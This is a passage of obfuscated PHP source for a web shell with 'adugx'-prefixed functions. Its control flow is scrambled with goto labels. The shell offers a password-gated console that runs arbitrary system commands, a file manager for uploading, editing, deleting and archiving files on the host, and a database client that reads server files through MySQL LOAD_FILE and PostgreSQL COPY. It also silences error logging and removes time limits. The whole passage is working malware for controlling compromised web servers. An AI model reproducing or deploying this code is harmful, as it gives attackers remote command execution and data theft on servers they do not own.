(req.readyState == 4) )\r\n\t\t\tif(req.status == 200) {\r\n\t\t\t\tvar reg = new RegExp(\"(\\\\d+)([\\\\S\\\\s]*)\", 'm');\r\n\t\t\t\tvar arr=reg.exec(req.responseText);\r\n\t\t\t\teval(arr[2].substr(0, arr[1]));\r\n\t\t\t} else alert('Request error!');\r\n\t}\r\n</script>\r\n<head><body><div style='position:absolute;width:100%;background-color:#444;top:0;left:0;'>\r\n<form method=post name=mf style='display:none;'>\r\n<input type=hidden name=a>\r\n<input type=hidden name=c>\r\n<input type=hidden name=p1>\r\n<input type=hidden name=p2>\r\n<input type=hidden name=p3>\r\n<input type=hidden name=charset>\r\n</form>"; goto B51cd; c2a99: foreach ($m as $k => $v) { $menu .= '<th width="' . (int) (100 / count($m)) . '%">[ <a href="#" onclick="g(\'' . $v . '\',null,\'\',\'\',\'\')">' . $k . '</a> ]</th>'; Ae6ff: } goto cf9fe; Dc2c0: } goto d5931; a7e92: if (!isset($_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax'])) { $_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax'] = (bool) $default_use_ajax; } goto E92e7; E1797: if (!function_exists("posix_getgrgid") && strpos($GLOBALS['disable_functions'], 'posix_getgrgid') === false) { function posix_getgrgid($p) { return false; } } goto c7b2c; dc40e: function adugxScandir($dir) { if (function_exists("scandir")) { return scandir($dir); } else { goto F8bb8; D9e82: if (!(false !== ($filename = readdir($dh)))) { goto b56fa; } goto feed4; feed4: $files[] = $filename; goto B8023; F8bb8: $dh = opendir($dir); goto Ec07a; Ec07a: D2368: goto D9e82; e5038: b56fa: goto A014a; A014a: return $files; goto b4c45; B8023: goto D2368; goto e5038; b4c45: } } goto d5d0e; Ee2ae: function adugxLogin() { die("<pre align=center><form method=post>Password: <input type=password name=pass><input type=submit value='>>'></form></pre>"); } goto a53c8; b2806: @set_time_limit(0); goto Bf534; a53c8: function adugxsetcookie($k, $v) { $_COOKIE[$k] = $v; setcookie($k, $v); } goto Abd9c; f4fd4: function adugxPermsColor($f) { if (!@is_readable($f)) { return '<font color=#FF0000>' . adugxPerms(@fileperms($f)) . '</font>'; } elseif (!@is_writable($f)) { return '<font color=white>' . adugxPerms(@fileperms($f)) . '</font>'; } else { return '<font color=#25ff00>' . adugxPerms(@fileperms($f)) . '</font>'; } } goto dc40e; d5d0e: function adugxWhich($p) { goto C2075; fccff: if (!empty($path)) { return $path; } goto C094c; C094c: return false; goto B0b3e; C2075: $path = adugxEx('which ' . $p); goto fccff; B0b3e: } goto ebd9f; d9dfc: $color = "#df5"; goto Cf1bb; dc9a6: @ini_set('error_log', NULL); goto B0e97; effb0: function actionConsole() { goto A982a; C3ff3: if (empty($_POST['ajax']) && !empty($_POST['p1'])) { adugxsetcookie(md5($_SERVER['HTTP_HOST']) . 'ajax', 0); } goto e221e; db22c: echo '</select><input type=button onclick="add(d.cf.alias.value);if(d.cf.ajax.checked){a(null,null,d.cf.alias.value,d.cf.show_errors.checked?1:\'\');}else{g(null,null,d.cf.alias.value,d.cf.show_errors.checked?1:\'\');}" value=">>"> <nobr><input type=checkbox name=ajax value=1 ' . (@$_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax'] ? 'checked' : '') . '> send using AJAX <input type=checkbox name=show_errors value=1 ' . (!empty($_POST['p2']) || $_COOKIE[md5($_SERVER['HTTP_HOST']) . 'stderr_to_out'] ? 'checked' : '') . '> redirect stderr to stdout (2>&1)</nobr><br/><textarea class=bigarea name=output style="border-bottom:0;margin:0;" readonly>'; goto D6d18; Ed407: foreach ($GLOBALS['aliases'] as $n => $v) { goto Eb99b; Eb99b: if ($v == '') { echo '<optgroup label="-' . htmlspecialchars($n) . '-"></optgroup>'; goto cd63a; } goto f67ad; f67ad: echo '<option value="' . htmlspecialchars($v) . '">' . $n . '</option>'; goto a5ff9; a5ff9: cd63a: goto d1d9b; d1d9b: } goto E80b3; b957a: echo "<script>\r\nif(window.Event) window.captureEvents(Event.KEYDOWN);\r\nvar cmds = new Array('');\r\nvar cur = 0;\r\nfunction kp(e) {\r\n\tvar n = (window.Event) ? e.which : e.keyCode;\r\n\tif(n == 38) {\r\n\t\tcur--;\r\n\t\tif(cur>=0)\r\n\t\t\tdocument.cf.cmd.value = cmds[cur];\r\n\t\telse\r\n\t\t\tcur++;\r\n\t} else if(n == 40) {\r\n\t\tcur++;\r\n\t\tif(cur < cmds.length)\r\n\t\t\tdocument.cf.cmd.value = cmds[cur];\r\n\t\telse\r\n\t\t\tcur--;\r\n\t}\r\n}\r\nfunction add(cmd) {\r\n\tcmds.pop();\r\n\tcmds.push(cmd);\r\n\tcmds.push('');\r\n\tcur = cmds.length-1;\r\n}\r\n</script>"; goto C4055; A982a: if (!empty($_POST['p1']) && !empty($_POST['p2'])) { adugxsetcookie(md5($_SERVER['HTTP_HOST']) . 'stderr_to_out', true); $_POST['p1'] .= ' 2>&1'; } elseif (!empty($_POST['p1'])) { adugxsetcookie(md5($_SERVER['HTTP_HOST']) . 'stderr_to_out', 0); } goto Af3b6; C4055: echo '<h1>Console</h1><div class=content><form name=cf onsubmit="if(d.cf.cmd.value==\'clear\'){d.cf.output.value=\'\';d.cf.cmd.value=\'\';return false;}add(this.cmd.value);if(this.ajax.checked){a(null,null,this.cmd.value,this.show_errors.checked?1:\'\');}else{g(null,null,this.cmd.value,this.show_errors.checked?1:\'\');} return false;"><select name=alias>'; goto Ed407; D6d18: if (!empty($_POST['p1'])) { echo htmlspecialchars("\$ " . $_POST['p1'] . "\n" . adugxEx($_POST['p1'])); } goto A20f1; Af3b6: if (isset($_POST['ajax'])) { goto A3793; a484a: echo "d.cf.cmd.value='';\n"; goto b7b4d; Bb506: echo "d.cf.output.scrollTop = d.cf.output.scrollHeight;"; goto c18af; F0cf8: ob_start(); goto a484a; F4082: echo strlen($temp), "\n", $temp; goto E50b1; b7b4d: $temp = @iconv($_POST['charset'], 'UTF-8', addcslashes("\n\$ " . $_POST['p1'] . "\n" . adugxEx($_POST['p1']), "\n\r\t\\'\0")); goto C680d; A3793: adugxsetcookie(md5($_SERVER['HTTP_HOST']) . 'ajax', true); goto F0cf8; Ce0c3: echo "d.cf.output.value+='" . $temp . "';"; goto Bb506; C680d: if (preg_match("!.*cd\\s+([^;]+)\$!", $_POST['p1'], $match)) { if (@chdir($match[1])) { $GLOBALS['cwd'] = @getcwd(); echo "c_='" . $GLOBALS['cwd'] . "';"; } } goto Ce0c3; c18af: $temp = ob_get_clean(); goto F4082; E50b1: exit; goto c006a; c006a: } goto C3ff3; A20f1: echo '</textarea><table style="border:1px solid #df5;background-color:#555;border-top:0px;" cellpadding=0 cellspacing=0 width="100%"><tr><td width="1%">$</td><td><input type=text name=cmd style="border:0px;width:100%;" onkeydown="kp(event);"></td></tr></table>'; goto d9171; d9171: echo '</form></div><script>d.cf.cmd.focus();</script>'; goto Dbe21; e221e: adugxHeader(); goto b957a; E80b3: F8d61: goto db22c; Dbe21: adugxFooter(); goto Dd58d; Dd58d: } goto C8ab3; A0e71: $default_charset = 'Windows-1251'; goto Bbf18; E93f8: $cwd = @getcwd(); goto Ef27f; d6fdb: if (strtolower(substr(PHP_OS, 0, 3)) == "win") { $os = 'win'; } else { $os = 'nix'; } goto A9095; c4a11: function actionFilesMan() { goto Afc93; D9dd1: usort($files, "adugxCmp"); goto A186b; ac49a: $l = 0; goto c1ab3; Abb5b: if (!empty($_COOKIE['act']) && @count($_COOKIE['f'])) { echo "<option value='paste'>Paste / Compress</option>"; } goto Ac4de; b34cd: if (@is_file($GLOBALS['cwd'] . $dirContent[$i])) { $files[] = array_merge($tmp, array('type' => 'file')); } elseif (@is_link($GLOBALS['cwd'] . $dirContent[$i])) { $dirs[] = array_merge($tmp, array('type' => 'link', 'link' => readlink($tmp['path']))); } elseif (@is_dir($GLOBALS['cwd'] . $dirContent[$i])) { $dirs[] = array_merge($tmp, array('type' => 'dir')); } goto Ec00a; a2019: $files = array_merge($dirs, $files); goto ac49a; Ec00a: c9300: goto B33fb; ce534: echo "<tr><td colspan=7>\r\n\t<input type=hidden name=a value='FilesMan'>\r\n\t<input type=hidden name=c value='" . htmlspecialchars($GLOBALS['cwd']) . "'>\r\n\t<input type=hidden name=charset value='" . (isset($_POST['charset']) ? $_POST['charset'] : '') . "'>\r\n\t<select name='p1'><option value='copy'>Copy</option><option value='move'>Move</option><option value='delete'>Delete</option>"; goto A59b8; B2091: $i = 0; goto Cadae; Ff700: Adbe7: goto bdbf0; D1378: $dirs = $files = array(); goto e0629; ad6f4: echo "<option value='tar'>Compress (tar.gz)</option>"; goto Abb5b; C3520: echo '<h1>File manager</h1><div class=content><script>p1_=p2_=p3_="";</script>'; goto dce8e; a8666: $gr = @posix_getgrgid(@filegroup($dirContent[$i])); goto C6cc5; Dea04: if ($dirContent === false) { goto a1450; a1450: echo 'Can\'t open this folder!'; goto E467f; D7139: return; goto e1454; E467f: adugxFooter(); goto D7139; e1454: } goto d140c; Afc6c: goto Eead3; goto Ff700; a5db8: function adugxCmp($a, $b) { if ($GLOBALS['sort'][0] != 'size') { return strcmp(strtolower($a[$GLOBALS['sort'][0]]), strtolower($b[$GLOBALS['sort'][0]])) * ($GLOBALS['sort'][1] ? 1 : -1); } else { return ($a['size'] < $b['size'] ? -1 : 1) * ($GLOBALS['sort'][1] ? 1 : -1); } } goto D9dd1; C9bf0: B3d7c: goto ce534; c3738: adugxFooter(); goto f810e; c7b3f: adugxHeader(); goto C3520; B33fb: $i++; goto Afc6c; A186b: usort($dirs, "adugxCmp"); goto a2019; e0629: $n = count($dirContent); goto B2091; Ac4de: echo "</select> "; goto Db435; f7788: echo "<script>\r\n\tfunction sa() {\r\n\t\tfor(i=0;i<d.files.elements.length;i++)\r\n\t\t\tif(d.files.elements[i].type == 'checkbox')\r\n\t\t\t\td.files.elements[i].checked = d.files.elements[0].checked;\r\n\t}\r\n</script>\r\n<table width='100%' class='main' cellspacing='0' cellpadding='2'>\r\n<form name=files method=post><tr><th width='13px'><input type=checkbox onclick='sa()' class=chkbx></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_name_" . ($sort[1] ? 0 : 1) . "\")'>Name</a></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_size_" . ($sort[1] ? 0 : 1) . "\")'>Size</a></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_modify_" . ($sort[1] ? 0 : 1) . "\")'>Modify</a></th><th>Owner/Group</th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_perms_" . ($sort[1] ? 0 : 1) . "\")'>Permissions</a></th><th>Actions</th></tr>"; goto D1378; Db435: if (!empty($_COOKIE['act']) && @count($_COOKIE['f']) && ($_COOKIE['act'] == 'zip' || $_COOKIE['act'] == 'tar')) { echo "file name: <input type=text name=p2 value='adugx_" . date("Ymd_His") . "." . ($_COOKIE['act'] == 'zip' ? 'zip' : 'tar.gz') . "'> "; } goto F0a4e; c1ab3: foreach ($files as $f) { goto Fe4b3; Fe4b3: echo '<tr' . ($l ? ' class=l1' : '') . '><td><input type=checkbox name="f[]" value="' . urlencode($f['name']) . '" class=chkbx></td><td><a href=# onclick="' . ($f['type'] == 'file' ? 'g(\'FilesTools\',null,\'' . urlencode($f['name']) . '\', \'view\')">' . htmlspecialchars($f['name']) : 'g(\'FilesMan\',\'' . $f['path'] . '\');" ' . (empty($f['link']) ? '' : "title='{$f['link']}'") . '><b>[ ' . htmlspecialchars($f['name']) . ' ]</b>') . '</a></td><td>' . ($f['type'] == 'file' ? adugxViewSize($f['size']) : $f['type']) . '</td><td>' . $f['modify'] . '</td><td>' . $f['owner'] . '/' . $f['group'] . '</td><td><a href=# onclick="g(\'FilesTools\',null,\'' . urlencode($f['name']) . '\',\'chmod\')">' . $f['perms'] . '</td><td><a href="#" onclick="g(\'FilesTools\',null,\'' . urlencode($f['name']) . '\', \'rename\')">R</a> <a href="#" onclick="g(\'FilesTools\',null,\'' . urlencode($f['name']) . '\', \'touch\')">T</a>' . ($f['type'] == 'file' ? ' <a href="#" onclick="g(\'FilesTools\',null,\'' . urlencode($f['name']) . '\', \'edit\')">E</a> <a href="#" onclick="g(\'FilesTools\',null,\'' . urlencode($f['name']) . '\', \'download\')">D</a>' : '') . '</td></tr>'; goto e9f98; E9a2b: Ea52d: goto d38f7; e9f98: $l = $l ? 0 : 1; goto E9a2b; d38f7: } goto C9bf0; dce8e: $dirContent = adugxScandir(isset($_POST['c']) ? $_POST['c'] : $GLOBALS['cwd']); goto Dea04; Cadae: Eead3: goto ef2c7; Bdb79: if (!empty($_POST['p1'])) { goto c287f; F5beb: a3f21: goto F54a9; F54a9: C45aa: goto de716; c287f: switch ($_POST['p1']) { case 'uploadFile': if (!@move_uploaded_file($_FILES['f']['tmp_name'], $_FILES['f']['name'])) { echo "Can't upload file!"; } goto C45aa; case 'mkdir': if (!@mkdir($_POST['p2'])) { echo "Can't create new dir"; } goto C45aa; case 'delete': goto b3441; D2c3b: if (is_array(@$_POST['f'])) { foreach ($_POST['f'] as $f) { goto F829a; a2e6d: if (is_dir($f)) { deleteDir($f); } else { @unlink($f); } goto b09d0; A82aa: $f = urldecode($f); goto a2e6d; F829a: if ($f == '..') { goto ff58d; } goto A82aa; b09d0: ff58d: goto Ab9d7; Ab9d7: } D59f3: } goto E0d69; E0d69: goto C45aa; goto Bb7b1; b3441: function deleteDir($path) { goto b6d80; b6d80: $path = substr($path, -1) == '/' ? $path : $path . '/'; goto C5b7a; Ce387: if ($type == "dir") { deleteDir($item); } else { @unlink($item); } goto bcdb3; Ab71c: if (basename($item) == ".." || basename($item) == ".") { goto E8a70; } goto Ed035; bcdb3: goto E8a70; goto F7ea4; Ed035: $type = filetype($item); goto Ce387; A2a60: @rmdir($path); goto f943f; F7ea4: C69c1: goto Ae454; b23ad: E8a70: goto c14c4; Ae454: closedir($dh); goto A2a60; B5fb4: $item = $path . $item; goto Ab71c; c14c4: if (!(($item = readdir($dh)) !== false)) { goto C69c1; } goto B5fb4; C5b7a: $dh = opendir($path); goto b23ad; f943f: } goto D2c3b; Bb7b1: case 'paste': goto fc9ac; fd37a: setcookie('f', '', time() - 3600); goto C9cd2; C9cd2: goto C45aa; goto C1e9e; fc9ac: if ($_COOKIE['act'] == 'copy') { goto B5186; B5186: function copy_paste($c, $s, $d) { if (is_dir($c . $s)) { goto B0b68; B0b68: mkdir($d . $s); goto B5617; D795c: goto Ef4d3; goto A0700; b9335: Ef4d3: goto Fb437; A0700: Dd696: goto Ef4b3; Fb437: if (!(($f = @readdir($h)) !== false)) { goto Dd696; } goto Dac55; B5617: $h = @opendir($c . $s); goto b9335; Dac55: if ($f != "." and $f != "..") { copy_paste($c . $s . '/', $f, $d . $s . '/'); } goto D795c; Ef4b3: } elseif (is_file($c . $s)) { @copy($c . $s, $d . $s); } } goto C1f94; B9523: c21e9: goto Acd52; C1f94: foreach ($_COOKIE['f'] as $f) { copy_paste($_COOKIE['c'], $f, $GLOBALS['cwd']); Ff36e: } goto B9523; Acd52: } elseif ($_COOKIE['act'] == 'move') { goto E0a2f; f27a5: C494d: goto a41f7; E0a2f: function move_paste($c, $s, $d) { if (is_dir($c . $s)) { goto d330f; b6fa7: eac4b: goto dc9a1; d2333: D31fc: goto A1652; C5460: goto eac4b; goto d2333; dc9a1: if (!(($f = @readdir($h)) !== false)) { goto D31fc; } goto C5c25; d330f: mkdir($d . $s); goto Fabd2; C5c25: if ($f != "." and $f != "..") { copy_paste($c . $s . '/', $f, $d . $s . '/'); } goto C5460; Fabd2: $h = @opendir($c . $s); goto b6fa7; A1652: } elseif (@is_file($c . $s)) { @copy($c . $s, $d . $s); } } goto E0887; E0887: foreach ($_COOKIE['f'] as $f) { @rename($_COOKIE['c'] . $f, $GLOBALS['cwd'] . $f); d5dc1: } goto f27a5; a41f7: } elseif ($_COOKIE['act'] == 'zip') { if (class_exists('ZipArchive')) { $zip = new ZipArchive(); if ($zip->open($_POST['p2'], 1)) { goto A7d02; b25ce: F145c: goto Cada9; A7d02: chdir($_COOKIE['c']); goto B35e0; B1607: $zip->close(); goto c3092; Cada9: chdir($GLOBALS['cwd']); goto B1607; B35e0: foreach ($_COOKIE['f'] as $f) { goto b2002; d11d3: fff82: goto b8a4c; A2a5c: if (@is_file($_COOKIE['c'] . $f)) { $zip->addFile($_COOKIE['c'] . $f, $f); } elseif (@is_dir($_COOKIE['c'] . $f)) { goto E31e5; E31e5: $iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($f . '/', FilesystemIterator::SKIP_DOTS)); goto Ec11e; Ec11e: foreach ($iterator as $key => $value) { $zip->addFile(realpath($key), $key); fdc67: } goto c1da1; c1da1: E8bdb: goto F9f19; F9f19: } goto d11d3; b2002: if ($f == '..') { goto fff82; } goto A2a5c; b8a4c: } goto b25ce; c3092: } } } elseif ($_COOKIE['act'] == 'unzip') { if (class_exists('ZipArchive')) { goto ef86b; e0eef: fb072: goto a2a7b; d147c: foreach ($_COOKIE['f'] as $f) { if ($zip->open($_COOKIE['c'] . $f)) { $zip->extractTo($GLOBALS['cwd']); $zip->close(); } ca972: } goto e0eef; ef86b: $zip = new ZipArchive(); goto d147c; a2a7b: } } elseif ($_COOKIE['act'] == 'tar') { goto F21b0; F4e08: $_COOKIE['f'] = array_map('escapeshellarg', $_COOKIE['f']); goto f9d04; F21b0: chdir($_COOKIE['c']); goto F4e08; F5b0b: chdir($GLOBALS['cwd']); goto f649a; f9d04: adugxEx('tar cfzv ' . escapeshellarg($_POST['p2']) . ' ' . implode(' ', $_COOKIE['f'])); goto F5b0b; f649a: } goto E863e; E863e: unset($_COOKIE['f']); goto fd37a; C1e9e: default: if (!empty($_POST['p1'])) { goto E4631; E4631: adugxsetcookie('act', $_POST['p1']); goto Ffc52; Ffc52: adugxsetcookie('f', serialize(@$_POST['f'])); goto C5b7b; C5b7b: adugxsetcookie('c', @$_POST['c']); goto f09a5; f09a5: } goto C45aa; } goto F5beb; de716: } goto c7b3f; f7a93: $ow = @posix_getpwuid(@fileowner($dirContent[$i])); goto a8666; C6cc5: $tmp = array('name' => $dirContent[$i], 'path' => $GLOBALS['cwd'] . $dirContent[$i], 'modify' => date('Y-m-d H:i:s', @filemtime($GLOBALS['cwd'] . $dirContent[$i])), 'perms' => adugxPermsColor($GLOBALS['cwd'] . $dirContent[$i]), 'size' => @filesize($GLOBALS['cwd'] . $dirContent[$i]), 'owner' => $ow['name'] ? $ow['name'] : @fileowner($dirContent[$i]), 'group' => $gr['name'] ? $gr['name'] : @filegroup($dirContent[$i])); goto b34cd; Afc93: if (!empty($_COOKIE['f'])) { $_COOKIE['f'] = @unserialize($_COOKIE['f']); } goto Bdb79; A59b8: if (class_exists('ZipArchive')) { echo "<option value='zip'>Compress (zip)</option><option value='unzip' selected>Uncompress (unzip)</option>"; } goto ad6f4; B2ef8: if (!empty($_POST['p1'])) { if (preg_match('!s_([A-z]+)_(\\d{1})!', $_POST['p1'], $match)) { $sort = array($match[1], (int) $match[2]); } } goto f7788; ef2c7: if (!($i < $n)) { goto Adbe7; } goto f7a93; F0a4e: echo "<input type='submit' value='>>'></td></tr></form></table></div>"; goto c3738; efc75: $sort = array('name', 1); goto B2ef8; bdbf0: $GLOBALS['sort'] = $sort; goto a5db8; d140c: global $sort; goto efc75; f810e: } goto Ce628; C8ab3: function actionLogout() { setcookie(md5($_SERVER['HTTP_HOST']), '', time() - 3600); die('bye!'); } goto E5a36; d5931: function adugxFooter() { $is_writable = is_writable($GLOBALS['cwd']) ? " <font color='green'>(Writeable)</font>" : " <font color=red>(Not writable)</font>"; echo "\r\n</div>\r\n<table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100% style='border-top:2px solid #333;border-bottom:2px solid #333;'>\r\n\t<tr>\r\n\t\t<td><form onsubmit='g(null,this.c.value,\"\");return false;'><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='" . htmlspecialchars($GLOBALS['cwd']) . "'><input type=submit value='>>'></form></td>\r\n\t\t<td><form onsubmit=\"g('FilesTools',null,this.f.value);return false;\"><span>Read file:</span><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td>\r\n\t</tr><tr>\r\n\t\t<td><form onsubmit=\"g('FilesMan',null,'mkdir',this.d.value);return false;\"><span>Make dir:</span>{$is_writable}<br><input class='toolsInp' type=text name=d><input type=submit value='>>'></form></td>\r\n\t\t<td><form onsubmit=\"g('FilesTools',null,this.f.value,'mkfile');return false;\"><span>Make file:</span>{$is_writable}<br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td>\r\n\t</tr><tr>\r\n\t\t<td><form onsubmit=\"g('Console',null,this.c.value);return false;\"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td>\r\n\t\t<td><form method='post' ENCTYPE='multipart/form-data'>\r\n\t\t<input type=hidden name=a value='FilesMAn'>\r\n\t\t<input type=hidden name=c value='" . $GLOBALS['cwd'] . "'>\r\n\t\t<input type=hidden name=p1 value='uploadFile'>\r\n\t\t<input type=hidden name=charset value='" . (isset($_POST['charset']) ? $_POST['charset'] : '') . "'>\r\n\t\t<span>Upload file:</span>{$is_writable}<br><input class='toolsInp' type=file name=f><input type=submit value='>>'></form><br ></td>\r\n\t</tr></table></div></body></html>"; } goto cdc37; b500f: function adugxViewSize($s) { if (is_int($s)) { $s = sprintf("%u", $s); } if ($s >= 1073741824) { return sprintf('%1.2f', $s / 1073741824) . ' GB'; } elseif ($s >= 1048576) { return sprintf('%1.2f', $s / 1048576) . ' MB'; } elseif ($s >= 1024) { return sprintf('%1.2f', $s / 1024) . ' KB'; } else { return $s . ' B'; } } goto aaa81; e1f11: if (isset($_POST['c'])) { @chdir($_POST['c']); } goto E93f8; Fbcf5: if ($cwd[strlen($cwd) - 1] != '/') { $cwd .= '/'; } goto a7e92; Ef27f: if ($os == 'win') { $home_cwd = str_replace("\\", "/", $home_cwd); $cwd = str_replace("\\", "/", $cwd); } goto Fbcf5; e44a6: error_reporting(0); goto ee956; f4602: @ini_set('max_execution_time', 0); goto b2806; c7b2c: function adugxEx($in) { goto Ea458; d98d1: if (function_exists('exec')) { @exec($in, $out); $out = @join("\n", $out); } elseif (function_exists('passthru')) { goto B9753; Df21c: @passthru($in); goto Fafdf; B9753: ob_start(); goto Df21c; Fafdf: $out = ob_get_clean(); goto F24f9; F24f9: } elseif (function_exists('system')) { goto D2920; b00e0: $out = ob_get_clean(); goto Bc2c2; c244c: @system($in); goto b00e0; D2920: ob_start(); goto c244c; Bc2c2: } elseif (function_exists('shell_exec')) { $out = shell_exec($in); } elseif (is_resource($f = @popen($in, "r"))) { goto E9df9; d4dc6: pclose($f); goto dd388; d655e: Bad55: goto d4dc6; b3bec: e625b: goto ee3ac; b4788: $out .= fread($f, 1024); goto C2a6e; E9df9: $out = ""; goto b3bec; C2a6e: goto e625b; goto d655e; ee3ac: if (@feof($f)) { goto Bad55; } goto b4788; dd388: } goto D037c; D037c: return $out; goto fffd7; Ea458: $out = ''; goto d98d1; fffd7: } goto b500f; de4e7: $default_use_ajax = true; goto A0e71; D0149: function actionSql() { goto b718e; b9260: echo ">PostgreSql</option></select></td>\r\n<td><input type=text name=sql_host value=\"" . (empty($_POST['sql_host']) ? 'localhost' : htmlspecialchars($_POST['sql_host'])) . "\"></td>\r\n<td><input type=text name=sql_login value=\"" . (empty($_POST['sql_login']) ? 'root' : htmlspecialchars($_POST['sql_login'])) . "\"></td>\r\n<td><input type=text name=sql_pass value=\"" . (empty($_POST['sql_pass']) ? '' : htmlspecialchars($_POST['sql_pass'])) . "\"></td><td>"; goto Cb28d; C3e0e: echo "</td>\r\n\t\t\t\t<td><input type=submit value='>>' onclick='fs(d.sf);'></td>\r\n <td><input type=checkbox name=sql_count value='on'" . (empty($_POST['sql_count']) ? '' : ' checked') . "> count the number of rows</td>\r\n\t\t\t</tr>\r\n\t\t</table>\r\n\t\t<script>\r\n s_db='" . @addslashes($_POST['sql_base']) . "';\r\n function fs(f) {\r\n if(f.sql_base.value!=s_db) { f.onsubmit = function() {};\r\n if(f.p1) f.p1.value='';\r\n if(f.p2) f.p2.value='';\r\n if(f.p3) f.p3.value='';\r\n }\r\n }\r\n\t\t\tfunction st(t,l) {\r\n\t\t\t\td.sf.p1.value = 'select';\r\n\t\t\t\td.sf.p2.value = t;\r\n if(l && d.sf.p3) d.sf.p3.value = l;\r\n\t\t\t\td.sf.submit();\r\n\t\t\t}\r\n\t\t\tfunction is() {\r\n\t\t\t\tfor(i=0;i<d.sf.elements['tbl[]'].length;++i)\r\n\t\t\t\t\td.sf.elements['tbl[]'][i].checked = !d.sf.elements['tbl[]'][i].checked;\r\n\t\t\t}\r\n\t\t</script>"; goto Facdd; Cb28d: $tmp = "<input type=text name=sql_base value=''>"; goto C86f1; b718e: class DbClass { var $type; var $link; var $res; function __construct($type) { $this->type = $type; } function connect($host, $user, $pass, $dbname) { goto e0020; f9803: ea815: goto Dad58; e0020: switch ($this->type) { case 'mysql': if ($this->link = @mysql_connect($host, $user, $pass, true)) { return true; } goto ea815; case 'pgsql': goto a342f; Fa6fb: goto ea815; goto Fcb1c; e875b: if (!$host[1]) { $host[1] = 5432; } goto e54e7; e54e7: if ($this->link = @pg_connect("host={$host[0]} port={$host[1]} user={$user} password={$pass} dbname={$dbname}")) { return true; } goto Fa6fb; a342f: $host = explode(':', $host); goto e875b; Fcb1c: } goto da292; da292: B1032: goto f9803; Dad58: return false; goto B877e; B877e: } function selectdb($db) { goto cacef; e80c3: a98b2: goto Ac5f4; D4b49: bbc80: goto e80c3; cacef: switch ($this->type) { case 'mysql': if (@mysql_select_db($db)) { return true; } goto a98b2; } goto D4b49; Ac5f4: return false; goto a2df5; a2df5: } function query($str) { goto c04cc; Fe7b8: return false; goto f4578; b3267: dae40: goto d278c; d278c: dc5ce: goto Fe7b8; c04cc: switch ($this->type) { case 'mysql': return $this->res = @mysql_query($str); goto dc5ce; case 'pgsql': return $this->res = @pg_query($this->link, $str); goto dc5ce; } goto b3267; f4578: } function fetch() { goto Be421; bc67f: switch ($this->type) { case 'mysql': return @mysql_fetch_assoc($res); goto E61af; case 'pgsql': return @pg_fetch_assoc($res); goto E61af; } goto F1965; E5db7: return false; goto Ff44a; C211e: E61af: goto E5db7; Be421: $res = func_num_args() ? func_get_arg(0) : $this->res; goto bc67f; F1965: F8b9c: goto C211e; Ff44a: } function listDbs() { goto Eae73; Ef9de: return false; goto c7c4a; db3f4: b3fa5: goto Ef9de; Eae73: switch ($this->type) { case 'mysql': return $this->query("SHOW databases"); goto b3fa5; case 'pgsql': return $this->res = $this->query("SELECT datname FROM pg_database WHERE datistemplate!='t'"); goto b3fa5; } goto D2b92; D2b92: ae499: goto db3f4; c7c4a: } function listTables() { goto B8b89; D8aaf: return false; goto a9d9b; A1e6b: af156: goto D8aaf; E9b30: e24e9: goto A1e6b; B8b89: switch ($this->type) { case 'mysql': return $this->res = $this->query('SHOW TABLES'); goto af156; case 'pgsql': return $this->res = $this->query("select table_name from information_schema.tables where table_schema != 'information_schema' AND table_schema != 'pg_catalog'"); goto af156; } goto E9b30; a9d9b: } function error() { goto db666; f56e3: da5f8: goto E0eca; fb8dc: return false; goto a8464; db666: switch ($this->type) { case 'mysql': return @mysql_error(); goto A4206; case 'pgsql': return @pg_last_error(); goto A4206; } goto f56e3; E0eca: A4206: goto fb8dc; a8464: } function setCharset($str) { goto C4bf2; B1209: Bca63: goto e5dbc; e5dbc: return false; goto A56ce; a1585: Cae95: goto B1209; C4bf2: switch ($this->type) { case 'mysql': if (function_exists('mysql_set_charset')) { return @mysql_set_charset($str, $this->link); } else { $this->query('SET CHARSET ' . $str); } goto Bca63; case 'pgsql': return @pg_set_client_encoding($this->link, $str); goto Bca63; } goto a1585; A56ce: } function loadFile($str) { goto e8826; e8826: switch ($this->type) { case 'mysql': return $this->fetch($this->query("SELECT LOAD_FILE('" . addslashes($str) . "') as file")); goto a99a5; case 'pgsql': goto B0f2e; B25cd: if (!($i = $this->fetch())) { goto c0de7; } goto e3de3; B0f2e: $this->query("CREATE TABLE adugx2(file text);COPY adugx2 FROM '" . addslashes($str) . "';select file from adugx2;"); goto f44e8; e3de3: $r[] = $i['file']; goto B2ac9; B2ac9: goto b6787; goto f51bf; Bf7bb: return array('file' => implode("\n", $r)); goto d946e; d2e40: $this->query('drop table adugx2'); goto Bf7bb; f51bf: c0de7: goto d2e40; Ca844: b6787: goto B25cd; d946e: goto a99a5; goto aacc4; f44e8: $r = array(); goto Ca844; aacc4: } goto b4fc7; d8c42: a99a5: goto A8b2a; A8b2a: return false; goto D21f4; b4fc7: Fd014: goto d8c42; D21f4: } function dump($table, $fp = false) { goto Dd16f; Bc1d6: f12e7: goto da6fe; da6fe: d9583: goto f3fc8; f3fc8: return false; goto fc0e3; Dd16f: switch ($this->type) { case 'mysql': goto f3f1e; D5621: $i = 0; goto e721f; c260f: $sql = $create[1] . ";\n"; goto a2fa7; Dd8ea: if (!($item = $this->fetch())) { goto D1c3e; } goto F8cdb; B6127: goto af70a; goto f9e2b; b77a9: $i++; goto B6127; d1317: Ba08c: goto beca8; f9e2b: D1c3e: goto E1276; ec8fe: if ($i % 1000 == 0) { $head = true; $sql = ";\n\n"; } goto cc377; E1276: if (!$head) { if ($fp) { fwrite($fp, ";\n\n"); } else { echo ";\n\n"; } } goto Ab8e1; Ea45b: $create = mysql_fetch_array($res); goto c260f; Ab8e1: goto d9583; goto A5d7e; B1b73: $this->query('SELECT * FROM `' . $table . '`'); goto D5621; E4552: foreach ($item as $k => $v) { goto a4a1e; F0a6f: A5883: goto C04a5; E7efd: $columns[] = "`" . $k . "`"; goto F0a6f; a4a1e: if ($v === null) { $item[$k] = "NULL"; } elseif 